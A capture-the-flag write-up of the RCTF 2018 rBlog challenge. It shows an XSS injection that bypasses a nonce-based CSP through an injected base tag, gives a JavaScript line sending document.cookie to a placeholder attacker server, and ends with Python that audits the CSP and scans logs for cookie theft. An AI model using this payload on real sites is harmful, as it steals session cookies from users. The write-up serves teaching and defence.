Tags: xss web csp-bypass
Rating: 5.0
# ▼▼▼rBlog 2018(Web:434pts) solved:27/400=6.8%▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
get `document.cookie`
http://rblog.2018.teamrois.cn
```
---
To get document.cookie, execution of script is required.
---
**【Understanding of functions】**
↓
```
About rBlog 2018
Store your secrets here but don't do evil things
Report Abuse
Report to admin who is using latest version of Chrome Stable
```
↓
・There is a function to **upload blog contents(title / contents / style / image)**.
・There is a function to **report to admin**.
---
**【Identify the location of the vulnerability】**
Try sending the request below
↓
```
POST / HTTP/1.1
Host: rblog.2018.teamrois.cn
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2cf9BXkX7RWDsXyP

------WebKitFormBoundary2cf9BXkX7RWDsXyP
Content-Disposition: form-data; name="title"

<>1
------WebKitFormBoundary2cf9BXkX7RWDsXyP
Content-Disposition: form-data; name="content"

<>2
------WebKitFormBoundary2cf9BXkX7RWDsXyP
Content-Disposition: form-data; name="effect"


------WebKitFormBoundary2cf9BXkX7RWDsXyP
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary2cf9BXkX7RWDsXyP--
```
---
The posted content can be viewed with the following request
```
GET /blog.php/79b4463a97b6a4fa223f02e899a4b46b43c9dd32 HTTP/1.1
Host: rblog.2018.teamrois.cn
```
↓
```
HTTP/1.1 200 OK
Date: Mon, 21 May 2018 09:49:16 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.2.5
Referrer-Policy: strict-origin
X-Frame-Options: DENY
Content-Security-Policy: default-src 'none'; script-src 'nonce-3ae08923a2654e27a3734f7876a5abe0'; frame-src https://www.google.com/recaptcha/; style-src 'self' 'unsafe-inline' fonts.googleapis.com; font-src fonts.gstatic.com; img-src 'self'
Vary: Accept-Encoding
Content-Length: 696
Connection: close
Content-Type: text/html; charset=UTF-8

<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet" href="/assets/css/bootstrap.min.css">
<link rel="stylesheet" href="/assets/css/style.css">
<link href="https://fonts.googleapis.com/css?family=Titillium+Web" rel="stylesheet">
<title>rBlog 2018</title>
</head>
<body>
<div class="container mt-5">
<div class="card">
<div class="card-body">
<h2 class="card-title"><>1</h2>
<>2
```
↓
`<>1`
↓
The `title` parameter is reflected into the page unescaped: an HTML injection (XSS) point in `title`
---
**【Confirmation of defense mechanism】**
```
X-Frame-Options: DENY
Content-Security-Policy: default-src 'none'; script-src 'nonce-3ae08923a2654e27a3734f7876a5abe0'; frame-src https://www.google.com/recaptcha/; style-src 'self' 'unsafe-inline' fonts.googleapis.com; font-src fonts.gstatic.com; img-src 'self'
```
↓ Check restrictions related to script execution
```
default-src 'none'
script-src 'nonce-3ae08923a2654e27a3734f7876a5abe0';
```
↓
A script can only execute in the following form (the `nonce` attribute must match the value in the header)
```
<script src=●●● nonce={random}></script>
```
---
Check the markup around the injection point.
↓
```
<div class="container mt-5">
<div class="card">
<div class="card-body">
<h2 class="card-title"><>1</h2>
<>2
```
↓
A `<script>` tag with a relative `src` path is loaded after the injection point, and the CSP sets no `base-uri` directive (`base-uri` does not fall back to `default-src`, so `default-src 'none'` does not cover it).
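The two observations above (a nonced script with a relative `src`, and no `base-uri` directive) are what make the injection exploitable. The following Python is an added example, not part of the original writeup or the challenge: it parses the CSP header exactly as the page served it, reports the missing `base-uri`, reproduces with `urllib.parse.urljoin` how a `<base href>` changes where the page's own `/assets/js/jquery.min.js` is fetched from, and emits the hardened policy. `http://my-server.example/` is a placeholder standing in for the writeup's 【my_server】, and the document URL is the blog URL from the writeup.

```python
"""Added example (not from the writeup or the challenge): audit the served CSP
and reproduce the URL resolution that a missing base-uri directive exposes."""
from urllib.parse import urljoin

# CSP header exactly as served by the challenge response (copied from the writeup)
CSP_FROM_PAGE = (
    "default-src 'none'; "
    "script-src 'nonce-3ae08923a2654e27a3734f7876a5abe0'; "
    "frame-src https://www.google.com/recaptcha/; "
    "style-src 'self' 'unsafe-inline' fonts.googleapis.com; "
    "font-src fonts.gstatic.com; img-src 'self'"
)

# Document URL from the writeup; INJECTED_BASE is a placeholder for 【my_server】
DOCUMENT_URL = "http://rblog.2018.teamrois.cn/blog.php/79b4463a97b6a4fa223f02e899a4b46b43c9dd32"
INJECTED_BASE = "http://my-server.example/"  # placeholder host, not a real server


def parse_csp(header):
    """Split a CSP header into {directive: [source expressions]}."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def audit_csp(header):
    """Return findings for the HTML-injection-only bypass class used in this challenge.

    base-uri does NOT fall back to default-src, so 'default-src none' gives no
    protection against an injected <base href>.
    """
    policy = parse_csp(header)
    findings = []
    script_src = policy.get("script-src", policy.get("default-src", []))
    nonced = any(src.startswith("'nonce-") for src in script_src)
    if "base-uri" not in policy:
        msg = "base-uri missing: an injected <base href> retargets every relative src/href"
        if nonced:
            msg += "; the page's own nonced <script src> keeps its valid nonce"
        findings.append(msg)
    if "'unsafe-inline'" in policy.get("style-src", []):
        findings.append("style-src allows 'unsafe-inline': injected CSS is not blocked")
    return findings


def resolve_script_src(document_url, script_src, injected_base=None):
    """Resolve a <script src> the way a browser does: against <base href> when
    one precedes the script element, otherwise against the document URL."""
    return urljoin(injected_base or document_url, script_src)


def harden_csp(header):
    """Add base-uri 'self' when absent; that is the fix for this bypass."""
    policy = parse_csp(header)
    policy.setdefault("base-uri", ["'self'"])
    return "; ".join(" ".join([name, *sources]) for name, sources in policy.items())


if __name__ == "__main__":
    for finding in audit_csp(CSP_FROM_PAGE):
        print("FINDING :", finding)
    print("normal  :", resolve_script_src(DOCUMENT_URL, "/assets/js/jquery.min.js"))
    print("injected:", resolve_script_src(DOCUMENT_URL, "/assets/js/jquery.min.js", INJECTED_BASE))
    print("hardened:", harden_csp(CSP_FROM_PAGE))
```

`base-uri 'self'` (or `'none'`) is the directive that closes this hole regardless of how strict `script-src` is; escaping `title` on output removes the injection point itself.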
---
**【exploit】**
1. Create Payload
Insert `<base href="http://【my_server】/">` in the `title` parameter
↓ Then the page's existing nonced script tag resolves its relative `src` against the injected base:
`<script nonce="3ae08923a2654e27a3734f7876a5abe0" src="/assets/js/jquery.min.js"></script>` now loads `http://【my_server】/assets/js/jquery.min.js`, and because the tag still carries the valid nonce the CSP allows it
---
2. Place the following javascript in `http://【my_server】/assets/js/jquery.min.js`
```
location.href="http://【my_server】?"+document.cookie;
```
---
3. Send Payload to admin
↓
The admin's browser accessed 【my_server】:
```
115.159.200.107 - - [20/May/2018:07:02:09 +0000] "GET /?flag=RCTF{why_the_heck_no_mimetype_for_webp_in_apache2_in_8012};%20hint_for_rBlog_Rev.2=http://rblog.2018.teamrois.cn/blog.php/52c533a30d8129ee4915191c57965ef4c7718e6d HTTP/1.1" 200 2261
```
↓
`flag=RCTF{why_the_heck_no_mimetype_for_webp_in_apache2_in_8012}`
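The log line above is the signature of this exfiltration from the receiving side: `document.cookie` arrives as `name=value` pairs joined by `; ` (URL-encoded as `;%20`) inside a query string. The following Python is an added example, not part of the original writeup, showing how an outbound proxy or access log in Common Log Format can be scanned for that shape. The first log line is the one from the writeup; the second is a constructed benign request for contrast. Only cookie names are reported, never values.

```python
"""Added example (not from the writeup): flag logged requests whose query string
has the shape of an exfiltrated document.cookie ('a=b; c=d', URL-encoded)."""
import re
from urllib.parse import unquote, urlsplit

LOG_LINES = [
    # line from the writeup: the request the admin's browser made to 【my_server】
    '115.159.200.107 - - [20/May/2018:07:02:09 +0000] "GET /?flag=RCTF{why_the_heck_no_mimetype_for_webp_in_apache2_in_8012};%20hint_for_rBlog_Rev.2=http://rblog.2018.teamrois.cn/blog.php/52c533a30d8129ee4915191c57965ef4c7718e6d HTTP/1.1" 200 2261',
    # constructed benign line for contrast
    '10.0.0.5 - - [20/May/2018:07:03:00 +0000] "GET /index.html?page=2 HTTP/1.1" 200 512',
]

# Apache/Nginx Common Log Format: ip ident user [ts] "method target proto" status size
COMMON_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def cookie_like_names(target):
    """Return the cookie names when the decoded query string consists of two or
    more 'name=value' pairs joined by '; ', i.e. looks like document.cookie.
    Returns [] otherwise, so values (the cookies themselves) are never echoed."""
    decoded = unquote(urlsplit(target).query)
    pairs = decoded.split("; ")
    names = [pair.split("=", 1)[0] for pair in pairs if "=" in pair]
    return names if len(names) >= 2 else []


def scan_access_log(lines):
    """Return (ip, timestamp, cookie names) for each suspicious request."""
    hits = []
    for line in lines:
        match = COMMON_LOG.match(line)
        if not match:
            continue  # not CLF; skip rather than guess
        names = cookie_like_names(match["target"])
        if names:
            hits.append((match["ip"], match["ts"], names))
    return hits


if __name__ == "__main__":
    for ip, ts, names in scan_access_log(LOG_LINES):
        print(f"{ts} {ip} cookie-shaped query string, names={names}")
```

On the defending side the same shape shows up in egress proxy logs of the browsing host; on the application side, marking the session cookie `HttpOnly` keeps it out of `document.cookie` in the first place.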